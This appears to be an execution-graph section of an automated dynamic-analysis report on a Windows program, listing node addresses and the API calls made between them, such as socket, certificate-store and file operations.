                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:7.4%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:5.4%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:53
                                        execution_graph 42489 c1e09 42490 c1e29 42489->42490 42491 d2677 3 API calls 42490->42491 42492 c1e49 42491->42492 42493 c1e4f strtol 42492->42493 42494 c1e93 42492->42494 42496 c1e66 42493->42496 42495 c1e9b GetStdHandle 42494->42495 42499 c1eb7 42494->42499 42498 c1ea8 GetConsoleScreenBufferInfo 42495->42498 42495->42499 42502 d2920 free 42496->42502 42498->42499 42500 110ca6 _ValidateLocalCookies 5 API calls 42499->42500 42501 c1f0b 42500->42501 42502->42494 43601 e8a20 43602 d201d 14 API calls 43601->43602 43603 e8a4c 43602->43603 43621 ffea6 getaddrinfo 43603->43621 43606 e8a68 WSAGetLastError 43608 e8a7a 43606->43608 43609 e8a72 WSAGetLastError 43606->43609 43607 e8a85 EnterCriticalSection 43610 e8ab6 43607->43610 43611 e8a93 LeaveCriticalSection 43607->43611 43608->43607 43609->43608 43613 e8adf LeaveCriticalSection 43610->43613 43614 e8abf send 43610->43614 43634 e887e DeleteCriticalSection free free closesocket free 43611->43634 43617 e8aea 43613->43617 43614->43613 43616 e8ad6 WSAGetLastError 43614->43616 43615 e8aa2 free 43615->43617 43616->43613 43618 110ca6 _ValidateLocalCookies 5 API calls 43617->43618 43619 e8af9 43618->43619 43622 e8a5f 43621->43622 43624 ffed1 43621->43624 43622->43606 43622->43607 43623 fffec WSASetLastError 43623->43622 43624->43623 43625 fffc2 43624->43625 43628 fff30 43624->43628 43626 fffcb freeaddrinfo 43625->43626 43627 fffd4 43625->43627 43626->43627 43629 fffe8 43627->43629 43630 fffd8 43627->43630 43628->43624 43632 fff44 malloc 43628->43632 43629->43622 43629->43623 43635 ffe82 free 43630->43635 43632->43628 43633 fffe3 43632->43633 43633->43625 43634->43615 43635->43622 42488 d7bff 137 API calls 42505 cce40 _strdup 42506 cce52 setlocale 42505->42506 42507 cce69 42506->42507 42517 cce82 42506->42517 42509 cce6d strncmp 42507->42509 42515 ccecb 42507->42515 42512 ccebf free 42509->42512 42509->42517 42513 ccec7 42512->42513 42514 cceee 42513->42514 42513->42515 42557 c8599 28 API calls 42515->42557 42516 cceda 42519 ccef5 42516->42519 42520 ccee6 42516->42520 42517->42512 42528 cdc15 42517->42528 42519->42514 42523 cceff 42519->42523 42524 ccf06 42519->42524 42558 c89a1 19 API calls 42520->42558 42521 cceb6 42521->42512 42521->42513 42559 c8a54 18 API calls _ValidateLocalCookies 42523->42559 42526 ccf04 42524->42526 42560 c8b82 361 API calls 42524->42560 42526->42514 42529 cdc3f 42528->42529 42530 cdcb0 42528->42530 42561 c375a 42529->42561 42531 cdcc6 fopen 42530->42531 42533 cdcbd __acrt_iob_func 42530->42533 42555 cdc7a 42531->42555 42533->42555 42535 cdc57 fopen 42538 cdc6b free 42535->42538 42535->42555 42536 cdc81 42575 cdb81 16 API calls _strrchr 42536->42575 42539 cce9b 42538->42539 42539->42521 42556 c9159 15 API calls 42539->42556 42541 cdc8b 42553 cdc9e 42541->42553 42576 cdb81 16 API calls _strrchr 42541->42576 42543 ce047 42574 d0c88 free 42543->42574 42546 ce056 __acrt_iob_func 42547 ce06b free 42546->42547 42548 ce063 fclose 42546->42548 42547->42539 42548->42547 42549 cde14 malloc 42549->42543 42549->42553 42551 ce02b free 42551->42555 42552 cdf79 malloc 42552->42553 42553->42547 42553->42555 42554 c913e 20 API calls 42554->42555 42555->42543 42555->42547 42555->42549 42555->42551 42555->42552 42555->42554 42567 ce08f 42555->42567 42577 c52d9 21 API calls _ValidateLocalCookies 42555->42577 42556->42521 42557->42516 42558->42514 42559->42526 42560->42526 42562 c3775 42561->42562 42566 c3846 42561->42566 42563 d2677 3 API calls 42562->42563 42565 d2920 free 42562->42565 42562->42566 42578 c36ba 42562->42578 42563->42562 42565->42562 42566->42535 42566->42536 42570 ce09c ___from_strstr_to_strchr 42567->42570 42568 ce0b3 fgets 42568->42570 42573 ce106 42568->42573 42569 110ca6 _ValidateLocalCookies 5 API calls 42572 ce125 42569->42572 42570->42568 42570->42573 42588 d0ca0 free realloc free 42570->42588 42572->42555 42573->42569 42574->42546 42575->42541 42576->42553 42577->42555 42582 c36dc 42578->42582 42580 c374e 42580->42562 42581 c3737 _strdup _close 42587 d2920 free 42581->42587 42582->42580 42582->42581 42585 d0b16 _open 42582->42585 42586 d2920 free 42582->42586 42585->42582 42586->42582 42587->42580 42588->42570 42770 ca06f fopen 42771 ca0a7 42770->42771 42772 ca087 42770->42772 42809 cd323 42771->42809 42772->42771 42773 ca08f 42772->42773 42821 c9199 20 API calls 42773->42821 42776 ca0b1 42777 ca0c7 free 42776->42777 42778 ca0db 42776->42778 42777->42778 42780 ca0ed 42778->42780 42781 ca103 42778->42781 42779 ca030 42782 ca1a0 42779->42782 42825 c9b4c 7 API calls 42779->42825 42784 ca02a 42780->42784 42785 ca0f1 fclose 42780->42785 42817 cd8d0 42781->42817 42787 110ca6 _ValidateLocalCookies 5 API calls 42782->42787 42820 c9199 20 API calls 42784->42820 42785->42784 42789 cc5d1 42787->42789 42791 ca122 fclose 42794 ca12a 42791->42794 42792 ca158 42793 d2235 60 API calls 42792->42793 42798 ca1c1 42793->42798 42794->42779 42794->42792 42795 ca15a fopen 42794->42795 42796 ca151 42794->42796 42795->42792 42797 ca172 42795->42797 42822 c1018 _fileno _setmode 42796->42822 42800 c913e 20 API calls 42797->42800 42824 c91ba calloc 42798->42824 42801 ca17e free 42800->42801 42823 cfea5 free free free free 42801->42823 42804 ca1d6 42805 e16ca 308 API calls 42804->42805 42806 ca1e8 42805->42806 42806->42779 42807 cc598 fclose 42806->42807 42808 cc5a4 42807->42808 42808->42779 42810 cd3ec 42809->42810 42811 cd363 fgets 42809->42811 42812 110ca6 _ValidateLocalCookies 5 API calls 42810->42812 42811->42810 42814 cd37d ___from_strstr_to_strchr 42811->42814 42813 cd403 42812->42813 42813->42776 42814->42810 42816 cd3d2 fgets 42814->42816 42826 d0ca0 free realloc free 42814->42826 42816->42810 42816->42814 42827 d0dce 42817->42827 42820->42779 42821->42779 42822->42792 42823->42782 42824->42804 42825->42782 42826->42814 42828 d0de1 42827->42828 42829 ca110 free 42828->42829 42830 d0dea 42828->42830 42829->42791 42829->42794 42835 d0d8d malloc 42830->42835 42832 d0df3 42833 d0e0b 42832->42833 42834 d0e08 free 42832->42834 42833->42829 42834->42833 42835->42832 42836 cca6a 42837 cca85 42836->42837 42838 cca75 42836->42838 42839 cca7a 42838->42839 42849 cca8f 42838->42849 42981 c9199 20 API calls 42839->42981 42841 ccb58 42841->42837 42984 c9b4c 7 API calls 42841->42984 42847 ccaf1 Sleep 42847->42849 42849->42841 42849->42847 42850 c923b 42849->42850 42864 d22be 42849->42864 42880 c9327 42849->42880 42982 c336a 6 API calls 42849->42982 42983 c920d free 42849->42983 42851 c92cc 42850->42851 42854 c925e 42850->42854 42852 110ca6 _ValidateLocalCookies 5 API calls 42851->42852 42853 c92e9 42852->42853 42853->42849 42854->42851 42985 d0b16 _open 42854->42985 42856 c9273 42857 c927d _fstat64 42856->42857 42858 c92eb 42856->42858 42857->42858 42860 c928e 42857->42860 42987 c9159 15 API calls 42858->42987 42860->42851 42986 cf352 66 API calls _ValidateLocalCookies 42860->42986 42861 c92fe 42861->42851 42862 c9307 _close __acrt_iob_func _fileno 42861->42862 42862->42851 42865 d22cb 42864->42865 42869 d22c7 42864->42869 42866 d22ef 42865->42866 42867 d22de 42865->42867 42871 d2301 42866->42871 42988 d6ba2 calloc 42866->42988 43015 dd6ad 17 API calls _ValidateLocalCookies 42867->43015 42869->42849 42871->42869 43004 d6da2 42871->43004 42873 d2331 42874 d234e 42873->42874 42875 d2339 42873->42875 43010 d2261 42874->43010 42876 d8b08 308 API calls 42875->42876 42876->42869 42881 c9354 42880->42881 42977 c9998 42880->42977 42882 c9371 _close 42881->42882 42883 c9383 42881->42883 42881->42977 42882->42883 42884 c93e1 42883->42884 42886 c939c 42883->42886 42892 c942b 42884->42892 43095 d2362 10 API calls 42884->43095 42891 d2119 14 API calls 42886->42891 42887 c9423 42889 c94cc 42887->42889 42895 c949f fflush 42887->42895 42888 c93fd 42888->42892 42894 c9409 42888->42894 42893 c975c 42889->42893 42913 c94f0 42889->42913 43097 d027a 42889->43097 42890 c9451 42890->42887 43096 d2362 10 API calls 42890->43096 42896 c93bd 42891->42896 42892->42887 42892->42890 42897 c9446 _fileno 42892->42897 42898 c977d 42893->42898 42904 c976d fputs 42893->42904 42894->42887 42903 d2119 14 API calls 42894->42903 42895->42889 42899 c94ad 42895->42899 42896->42887 42900 c93c9 fputs 42896->42900 42897->42890 42905 c9789 fclose 42898->42905 42914 c97e0 42898->42914 42899->42889 42908 d2119 14 API calls 42899->42908 42900->42887 42903->42887 42904->42898 42909 c97b6 42905->42909 42910 c9797 42905->42910 42906 c9475 42906->42887 42912 c1fdc 35 API calls 42906->42912 42907 c9a7d 42911 c9a92 42907->42911 43109 d0637 32 API calls ___from_strstr_to_strchr 42907->43109 42908->42889 42909->42914 43107 c911d 20 API calls 42909->43107 42910->42909 42910->42914 42920 d2119 14 API calls 42910->42920 42916 c9aae 42911->42916 42923 c9aa6 fclose 42911->42923 42912->42887 42913->42893 42917 c9583 42913->42917 42918 c9553 42913->42918 42942 c9568 42913->42942 42914->42907 43108 d2362 10 API calls 42914->43108 42925 c9acb 42916->42925 42926 c9ab7 free 42916->42926 42922 c95e7 42917->42922 42932 c9595 42917->42932 43101 d2362 10 API calls 42918->43101 42920->42909 42921 c9897 42929 c913e 20 API calls 42921->42929 43104 d2362 10 API calls 42922->43104 42923->42916 42934 c9ae6 42925->42934 42939 c9ade fclose 42925->42939 42926->42925 42928 c9820 42928->42907 42941 c9841 _strdup 42928->42941 42954 c98c3 42929->42954 43102 d2362 10 API calls 42932->43102 42933 c97d5 _unlink 42933->42914 42935 c9aef free 42934->42935 42936 c9b03 42934->42936 42935->42936 42940 c9b15 42936->42940 42944 e16ca 308 API calls 42936->42944 42937 c95fc 42937->42942 43105 d2362 10 API calls 42937->43105 42939->42934 42946 c9b1b free 42940->42946 42947 c9b24 free free free 42940->42947 42948 c985d 42941->42948 42949 c99d4 CreateFileA 42941->42949 42942->42893 42942->42921 43106 d2362 10 API calls 42942->43106 42943 c95aa 43103 d2362 10 API calls 42943->43103 42944->42940 42946->42947 42947->42977 42948->42949 42951 c986d 42948->42951 42952 c99fb 42949->42952 42953 c99f3 free 42949->42953 42956 c913e 20 API calls 42951->42956 42957 c9a60 GetLastError 42952->42957 42958 c9a01 42952->42958 42953->42952 42962 c9926 fflush _fileno _get_osfhandle _lseeki64 42954->42962 42964 d2119 14 API calls 42954->42964 42954->42977 42955 c96a4 42955->42921 42959 d027a 2 API calls 42955->42959 42960 c987c 42956->42960 42961 c913e 20 API calls 42957->42961 42967 c9a1e SetFileTime 42958->42967 42980 c96f2 42959->42980 42960->42907 42966 c988a free 42960->42966 42963 c9a7a 42961->42963 42965 c995f 42962->42965 42979 c9989 42962->42979 42963->42907 42970 c9920 42964->42970 42971 c9965 SetEndOfFile 42965->42971 42965->42979 42966->42907 42968 c9a38 GetLastError 42967->42968 42969 c9a55 CloseHandle 42967->42969 42973 c913e 20 API calls 42968->42973 42969->42907 42970->42962 42972 c9972 fseek 42971->42972 42971->42979 42972->42977 42972->42979 42976 c9a52 42973->42976 42974 d2119 14 API calls 42974->42977 42975 c9749 42978 c913e 20 API calls 42975->42978 42976->42969 42977->42849 42978->42893 42979->42974 42979->42977 42980->42921 42980->42975 42981->42837 42982->42849 42983->42849 42984->42837 42985->42856 42986->42851 42987->42861 42989 d6bc3 calloc 42988->42989 42990 d6c5d 42989->42990 42991 d6bd1 42989->42991 42990->42871 43017 e8f8c 60 API calls 42991->43017 42993 d6c0c 42994 d6c64 42993->42994 43018 ee990 42993->43018 42995 d6aa3 free 42994->42995 42997 d6c6c 42995->42997 42999 ed032 free 42997->42999 42998 d6c47 WSACreateEvent 42998->42990 42998->42994 43000 d6c74 42999->43000 43001 d6c7f free 43000->43001 43002 ed032 free 43000->43002 43001->42990 43002->43001 43005 d6db1 43004->43005 43009 d6dd8 43004->43009 43005->43009 43023 d941d 19 API calls 2 library calls 43005->43023 43007 d6e3b 43024 d927c 7 API calls 43007->43024 43009->42873 43012 d226c 43010->43012 43014 d22a9 43012->43014 43025 d760d 43012->43025 43054 d8a2b 43012->43054 43016 d7276 143 API calls 43014->43016 43015->42869 43016->42869 43017->42993 43019 ee99e socket 43018->43019 43020 ee994 43018->43020 43021 ee9ba 43019->43021 43022 ee9b1 closesocket 43019->43022 43020->42998 43021->42998 43022->43021 43023->43007 43024->43009 43027 d7668 43025->43027 43033 d7654 43025->43033 43026 110ca6 _ValidateLocalCookies 5 API calls 43029 d795f 43026->43029 43027->43026 43028 d76e1 43066 d91a5 43028->43066 43029->43012 43030 d752d 19 API calls 43030->43033 43033->43027 43033->43028 43033->43030 43034 d7716 malloc 43038 d773c 43034->43038 43039 d7735 43034->43039 43035 d7866 WSAWaitForMultipleEvents 43037 d791f WSAResetEvent 43035->43037 43050 d788c 43035->43050 43037->43027 43041 d7934 free 43037->43041 43044 d7743 43038->43044 43039->43027 43041->43027 43042 d752d 19 API calls 43042->43050 43044->43035 43046 d77d7 send 43044->43046 43047 d780f WSAEventSelect 43044->43047 43049 d784d 43044->43049 43074 d752d 43044->43074 43045 d78da WSAEnumNetworkEvents WSAEventSelect 43045->43050 43046->43047 43047->43044 43048 d7894 43047->43048 43048->43050 43052 d78b1 free 43048->43052 43049->43035 43051 ef35e 12 API calls 43049->43051 43050->43037 43050->43042 43050->43045 43053 d7860 43051->43053 43052->43050 43053->43035 43053->43050 43055 f480b 2 API calls 43054->43055 43058 d8a50 43055->43058 43056 110ca6 _ValidateLocalCookies 5 API calls 43057 d8b06 43056->43057 43057->43012 43062 d8a9f 43058->43062 43065 d8a77 43058->43065 43080 d7b97 43058->43080 43061 d8ade 43061->43065 43092 d927c 7 API calls 43061->43092 43062->43061 43090 ecc72 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 43062->43090 43091 d8fae IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 43062->43091 43065->43056 43067 d91c8 43066->43067 43068 d91d0 43066->43068 43070 110ca6 _ValidateLocalCookies 5 API calls 43067->43070 43068->43067 43069 f480b 2 API calls 43068->43069 43071 d91e3 43069->43071 43072 d76f4 43070->43072 43078 eca76 5 API calls _ValidateLocalCookies 43071->43078 43072->43034 43072->43044 43075 d7539 43074->43075 43076 d755b 43074->43076 43075->43076 43079 e8e57 19 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 43075->43079 43076->43044 43078->43067 43079->43076 43081 d7bc8 43080->43081 43087 d89ca 43080->43087 43082 d6f2d 137 API calls 43081->43082 43084 d7bf1 43081->43084 43081->43087 43082->43084 43083 d95e3 19 API calls 43083->43084 43084->43083 43086 f0211 20 API calls 43084->43086 43084->43087 43089 e2166 117 API calls 43084->43089 43093 d7961 137 API calls 43084->43093 43094 e9e52 18 API calls 43084->43094 43086->43084 43087->43058 43089->43084 43090->43062 43091->43062 43092->43065 43093->43084 43094->43084 43095->42888 43096->42906 43098 d02da GetTickCount 43097->43098 43099 d028a QueryPerformanceCounter 43097->43099 43100 d02ac __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 43098->43100 43099->43100 43100->42913 43101->42942 43102->42943 43103->42942 43104->42937 43105->42942 43106->42955 43107->42933 43108->42928 43109->42911 43600 d7bff 418 API calls 42504 d7bff 239 API calls 43674 103ea4 43761 10336c 43674->43761 43676 110ca6 _ValidateLocalCookies 5 API calls 43677 104570 43676->43677 43678 103f3d 43680 10445e calloc 43678->43680 43681 103fa4 _strdup 43678->43681 43689 103f91 43678->43689 43684 104470 calloc 43680->43684 43682 103fb5 43681->43682 43723 103f34 43681->43723 43767 103bb5 10 API calls 43682->43767 43687 104480 43684->43687 43710 1044a9 43684->43710 43686 103f22 43686->43678 43690 103f29 43686->43690 43775 dd6ad 17 API calls _ValidateLocalCookies 43687->43775 43688 103fd0 43694 104044 43688->43694 43698 103feb fopen 43688->43698 43695 104025 43689->43695 43697 10404c 43689->43697 43766 dd6ad 17 API calls _ValidateLocalCookies 43690->43766 43693 104332 CertOpenStore 43693->43694 43699 104355 GetLastError 43693->43699 43694->43693 43707 1043a6 free CryptStringToBinaryA 43694->43707 43716 104380 free 43694->43716 43718 1043e3 free 43694->43718 43694->43723 43724 10438b free 43694->43724 43726 104437 43694->43726 43732 104301 CertCloseStore 43694->43732 43773 dd6ad 17 API calls _ValidateLocalCookies 43694->43773 43768 dd6ad 17 API calls _ValidateLocalCookies 43695->43768 43696 10448b 43701 104496 CertFreeCertificateContext 43696->43701 43696->43723 43697->43693 43703 104091 free 43697->43703 43704 104099 43697->43704 43698->43694 43705 104007 43698->43705 43774 dd6ad 17 API calls _ValidateLocalCookies 43699->43774 43701->43723 43703->43704 43709 1040a7 fseek 43704->43709 43727 1041a8 43704->43727 43705->43689 43707->43694 43713 1043f9 CertFindCertificateInStore 43707->43713 43708 10431d free 43708->43694 43714 10414a 43709->43714 43715 1040c9 ftell 43709->43715 43711 1044f2 43710->43711 43712 1044e6 CertFreeCertificateContext 43710->43712 43711->43723 43776 da216 23 API calls _ValidateLocalCookies 43711->43776 43712->43711 43713->43694 43719 104425 free 43713->43719 43720 10415c fseek 43714->43720 43721 1040d7 43714->43721 43715->43714 43715->43721 43716->43694 43717 1041d4 malloc 43739 10425b 43717->43739 43740 1041fd 43717->43740 43718->43694 43719->43694 43720->43721 43725 10417b malloc 43720->43725 43730 104101 43721->43730 43731 1040ee fread 43721->43731 43723->43676 43724->43694 43725->43721 43728 10443d CertCloseStore 43726->43728 43727->43717 43727->43727 43728->43680 43729 104504 43777 dd6ad 17 API calls _ValidateLocalCookies 43729->43777 43734 104108 fclose 43730->43734 43731->43730 43731->43734 43732->43694 43734->43727 43738 10411d 43734->43738 43737 104511 free 43737->43723 43769 dd6ad 17 API calls _ValidateLocalCookies 43738->43769 43745 104281 43739->43745 43751 10427e free 43739->43751 43742 104201 MultiByteToWideChar 43740->43742 43743 10421e PFXImportCertStore 43740->43743 43742->43743 43755 104244 free 43743->43755 43748 1042c3 CertFindCertificateInStore 43745->43748 43749 104285 GetLastError 43745->43749 43746 10412e free 43746->43723 43748->43728 43750 1042e3 GetLastError 43748->43750 43753 104290 43749->43753 43754 1042a9 43749->43754 43772 dd6ad 17 API calls _ValidateLocalCookies 43750->43772 43751->43745 43770 dd6ad 17 API calls _ValidateLocalCookies 43753->43770 43771 dd6ad 17 API calls _ValidateLocalCookies 43754->43771 43755->43739 43759 1042a1 43759->43723 43760 1042fb 43760->43732 43763 10338f 43761->43763 43762 10340e 43762->43678 43762->43723 43765 103b1a strtol strncmp strncmp ___from_strstr_to_strchr 43762->43765 43763->43762 43778 dd6ad 17 API calls _ValidateLocalCookies 43763->43778 43765->43686 43766->43723 43767->43688 43768->43694 43769->43746 43770->43759 43771->43759 43772->43760 43773->43708 43774->43694 43775->43696 43776->43729 43777->43737 43778->43762 40946 d7ccf 40969 d7b5d 40946->40969 40951 d7d18 40952 d7d31 40951->40952 40999 d941d 19 API calls 2 library calls 40951->40999 40978 e5d7a 40952->40978 40955 d7d4f 40960 d7bff 40955->40960 41017 d7961 137 API calls 40955->41017 40961 d89ca 40960->40961 40962 d95e3 19 API calls 40960->40962 40989 f0211 40960->40989 40997 d7961 137 API calls 40960->40997 41018 e9e52 18 API calls 40960->41018 41019 e2166 40960->41019 40962->40960 40970 d7b69 malloc 40969->40970 40971 d7b8e 40969->40971 40970->40971 40971->40955 40973 ef716 40971->40973 41033 f480b 40973->41033 40976 d7cf7 40976->40951 40998 d941d 19 API calls 2 library calls 40976->40998 40977 ef738 41037 110ca6 40977->41037 41045 e39d0 40978->41045 40980 e5d8e 41051 e54c5 40980->41051 40982 d7d41 40982->40955 41000 dd632 40982->41000 40985 e5df4 40985->40982 41152 d7405 40985->41152 40987 e5e0e 40988 e2166 117 API calls 40987->40988 40988->40982 40990 f480b 2 API calls 40989->40990 40994 f0229 40990->40994 40991 f02d4 40991->40960 40992 f035a 40992->40991 41986 efd8c 40992->41986 40994->40991 40994->40992 40995 f02c5 40994->40995 40995->40991 42014 dd6ad 17 API calls _ValidateLocalCookies 40995->42014 40997->40960 40998->40951 40999->40952 41001 dd69a 41000->41001 41003 dd64d 41000->41003 41002 110ca6 _ValidateLocalCookies 5 API calls 41001->41002 41004 d7d92 41002->41004 41003->41001 41005 d1fd4 14 API calls 41003->41005 41013 d95e3 41004->41013 41006 dd66d 41005->41006 41007 dd67f 41006->41007 41008 dd6a7 41006->41008 42032 ddc17 fwrite fwrite 41007->42032 42033 110dd6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 41008->42033 41011 dd698 41011->41001 41012 dd6ac 41014 d9615 41013->41014 41015 d95ef 41013->41015 41014->40955 42034 d941d 19 API calls 2 library calls 41015->42034 41017->40960 41018->40960 41020 e217e 41019->41020 41021 e218e 41020->41021 41022 e21f5 41020->41022 42036 eec6b free free 41020->42036 42035 100ff1 8 API calls 41021->42035 41022->40960 41034 f481c QueryPerformanceCounter 41033->41034 41035 f4873 GetTickCount 41033->41035 41036 f483e __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41034->41036 41035->41036 41036->40977 41038 110caf IsProcessorFeaturePresent 41037->41038 41039 110cae 41037->41039 41041 110cf1 41038->41041 41039->40976 41044 110cb4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41041->41044 41043 110dd4 41043->40976 41044->41043 41046 e39e8 free 41045->41046 41047 e3a06 free 41046->41047 41048 e3a1a 41047->41048 41049 e3a22 41047->41049 41156 e16ca 41048->41156 41049->40980 41052 e54e7 41051->41052 41053 e5510 41052->41053 41383 e2ebe calloc 41052->41383 41053->40982 41053->40985 41134 e5c82 41053->41134 41057 e5536 41057->41053 41468 e40dc 41057->41468 41059 e55cb 41059->41053 41505 e4683 41059->41505 41063 e560d 41063->41053 41560 e4d9e 41063->41560 41068 e566a 41068->41053 41070 e568a 41068->41070 41071 e2e9b 17 API calls 41068->41071 41069 e2e9b 17 API calls 41069->41068 41070->41053 41072 e2e9b 17 API calls 41070->41072 41073 e56aa 41070->41073 41071->41070 41072->41073 41073->41053 41074 e580b 41073->41074 41078 e5768 41073->41078 41570 e6afb 41074->41570 41081 e57fd 41078->41081 41082 e5796 41078->41082 41084 e5e2f 3 API calls 41081->41084 41620 e90d7 18 API calls _ValidateLocalCookies 41082->41620 41084->41053 41135 ef716 7 API calls 41134->41135 41136 e5ca6 41135->41136 41137 f480b 2 API calls 41136->41137 41149 e5cb3 41136->41149 41138 e5cce 41137->41138 41139 e5ce9 41138->41139 41140 e5d04 41138->41140 41828 df1ba 41139->41828 41141 ef716 7 API calls 41140->41141 41143 e5d15 41141->41143 41145 e5d39 41143->41145 41146 ef716 7 API calls 41143->41146 41144 e5cfd 41147 f480b 2 API calls 41144->41147 41144->41149 41838 de64d 41145->41838 41146->41145 41147->41149 41149->40985 41153 d7411 41152->41153 41155 d7416 41152->41155 41985 e9e52 18 API calls 41153->41985 41155->40987 41157 e16dc 41156->41157 41158 e1ae5 41156->41158 41157->41158 41229 d956a 17 API calls 41157->41229 41158->41049 41160 e16f1 41161 d7405 18 API calls 41160->41161 41162 e16f8 41161->41162 41163 e1706 41162->41163 41230 d7276 143 API calls 41162->41230 41166 e1712 41163->41166 41231 d8b08 41163->41231 41167 e1743 41166->41167 41170 e1740 free 41166->41170 41168 e39d0 282 API calls 41167->41168 41169 e174a 41168->41169 41245 e74bc 17 API calls 41169->41245 41170->41167 41172 e1751 free 41174 e1782 free 41172->41174 41246 e7663 free free free 41174->41246 41176 e1792 free 41178 e17b7 free 41176->41178 41179 e17d4 41176->41179 41178->41179 41247 e15c6 41179->41247 41185 e1809 free 41259 e1251 108 API calls 41185->41259 41229->41160 41230->41163 41232 d8b2a 41231->41232 41235 d8b15 41231->41235 41232->41166 41233 d8b83 41260 e95d1 41233->41260 41235->41232 41235->41233 41278 d6f2d 41235->41278 41240 ed032 free 41241 d8ba0 41240->41241 41274 ed032 41241->41274 41244 d8bd7 free 41244->41232 41245->41172 41246->41176 41248 e15df free 41247->41248 41249 e15fe free 41248->41249 41250 e161b free 41249->41250 41251 e1638 free 41250->41251 41252 e1655 free 41251->41252 41253 e1672 free 41252->41253 41254 e168f free 41253->41254 41255 e16ac free 41254->41255 41376 d5d80 41255->41376 41258 dd126 free 41258->41185 41261 e965a 41260->41261 41265 e95f2 41260->41265 41262 110ca6 _ValidateLocalCookies 5 API calls 41261->41262 41263 d8b8d 41262->41263 41268 d6aa3 41263->41268 41264 e9641 41266 e16ca 308 API calls 41264->41266 41265->41264 41267 e2166 117 API calls 41265->41267 41266->41261 41267->41265 41269 d6ab9 41268->41269 41270 d6acd 41269->41270 41271 ed032 free 41269->41271 41272 ed032 free 41270->41272 41271->41269 41273 d6ad4 41272->41273 41273->41240 41273->41241 41275 d8bbc WSACloseEvent 41274->41275 41276 ed03b 41274->41276 41275->41244 41277 ed06b free 41276->41277 41277->41275 41279 d7057 41278->41279 41280 d6f61 41278->41280 41284 110ca6 _ValidateLocalCookies 5 API calls 41279->41284 41281 d6f7c 41280->41281 41282 d6f70 41280->41282 41327 e8afd 41281->41327 41326 e8ca8 45 API calls 41282->41326 41287 d7075 41284->41287 41286 d6f79 free 41289 d6fb9 free 41286->41289 41287->41235 41291 d6fd1 41289->41291 41290 d701b 41293 d95e3 19 API calls 41290->41293 41291->41290 41315 ef6ce 41291->41315 41294 d7035 41293->41294 41295 d7405 18 API calls 41294->41295 41296 d704f 41295->41296 41296->41279 41297 d708c 41296->41297 41342 eec6b free free 41296->41342 41320 ee3eb 41297->41320 41302 d70c3 41305 d70e2 41302->41305 41343 dd126 free 41302->41343 41304 d71de 41309 e2166 117 API calls 41304->41309 41305->41304 41306 d7147 41305->41306 41344 d201d 41306->41344 41308 d7198 41347 e935c 119 API calls 41308->41347 41310 d71d0 free 41309->41310 41310->41279 41312 d71b4 41312->41310 41314 dd632 17 API calls 41312->41314 41314->41310 41316 f0211 20 API calls 41315->41316 41318 ef6e4 41316->41318 41317 ef709 41317->41290 41318->41317 41348 d2119 41318->41348 41321 ee44e 41320->41321 41325 ee407 41320->41325 41322 110ca6 _ValidateLocalCookies 5 API calls 41321->41322 41323 d7096 free 41322->41323 41323->41302 41323->41305 41324 ee41d _time64 41324->41321 41325->41321 41325->41324 41326->41286 41328 e8b0e EnterCriticalSection LeaveCriticalSection 41327->41328 41329 e8b80 free 41327->41329 41330 e8b3a CloseHandle 41328->41330 41331 e8b44 41328->41331 41329->41286 41335 e8b6c 41330->41335 41332 e8b49 41331->41332 41333 e8b50 41331->41333 41370 10697a WaitForSingleObjectEx CloseHandle 41332->41370 41371 e887e DeleteCriticalSection free free closesocket free 41333->41371 41372 d8f25 free 41335->41372 41339 e8b58 free 41339->41335 41340 e8b79 closesocket 41340->41329 41342->41297 41343->41302 41373 d1fd4 41344->41373 41347->41312 41351 d1535 41348->41351 41361 d0f87 41351->41361 41353 d158f 41354 110ca6 _ValidateLocalCookies 5 API calls 41353->41354 41355 d1fa2 41354->41355 41355->41317 41356 d1616 fputc 41356->41353 41359 d1589 __aulldvrm 41356->41359 41357 d15d6 fputc 41357->41353 41357->41359 41358 d201d 12 API calls 41358->41359 41359->41353 41359->41356 41359->41357 41359->41358 41369 d0e54 __stdio_common_vsprintf 41359->41369 41363 d1430 41361->41363 41368 d0fa9 41361->41368 41362 d0eda strncmp strncmp 41362->41368 41363->41359 41364 d1008 strncmp 41365 d1026 strncmp 41364->41365 41364->41368 41365->41368 41366 d115a strtol 41366->41368 41367 d1122 strtol 41367->41368 41368->41362 41368->41363 41368->41364 41368->41366 41368->41367 41369->41359 41370->41333 41371->41339 41372->41340 41374 d1535 14 API calls 41373->41374 41375 d1ff7 41374->41375 41375->41308 41377 d5d9e free 41376->41377 41378 d5d87 41376->41378 41377->41258 41382 d49d3 12 API calls 41378->41382 41380 d5d8c free 41380->41377 41382->41380 41384 e2edf calloc 41383->41384 41385 e2eed calloc 41384->41385 41386 e323a 41384->41386 41387 e2f0b calloc 41385->41387 41386->41053 41400 e33bc 41386->41400 41388 e2f2b 41387->41388 41389 e2f13 free 41387->41389 41391 f480b 2 API calls 41388->41391 41392 e322b 41389->41392 41393 e2f9c 41391->41393 41392->41386 41394 f480b 2 API calls 41393->41394 41399 e2fb2 41394->41399 41395 e31f3 41396 f480b 2 API calls 41395->41396 41396->41392 41397 e31d4 free 41398 e31eb free 41397->41398 41398->41395 41399->41395 41399->41397 41401 e33d3 41400->41401 41402 e15c6 21 API calls 41401->41402 41403 e33ea 41402->41403 41404 e33ee 41403->41404 41405 e33fb 41403->41405 41629 d5da0 15 API calls 41404->41629 41630 d5d67 calloc calloc 41405->41630 41408 e33f9 41409 e3400 41408->41409 41410 e3473 41409->41410 41418 e34c2 41409->41418 41631 d4c7f tolower 41409->41631 41411 e3502 41410->41411 41632 d649e 96 API calls 41410->41632 41634 d5f16 24 API calls _ValidateLocalCookies 41411->41634 41415 e3525 41415->41418 41635 d5f16 24 API calls _ValidateLocalCookies 41415->41635 41416 e34bc 41416->41418 41633 d5f16 24 API calls _ValidateLocalCookies 41416->41633 41418->41057 41420 e3427 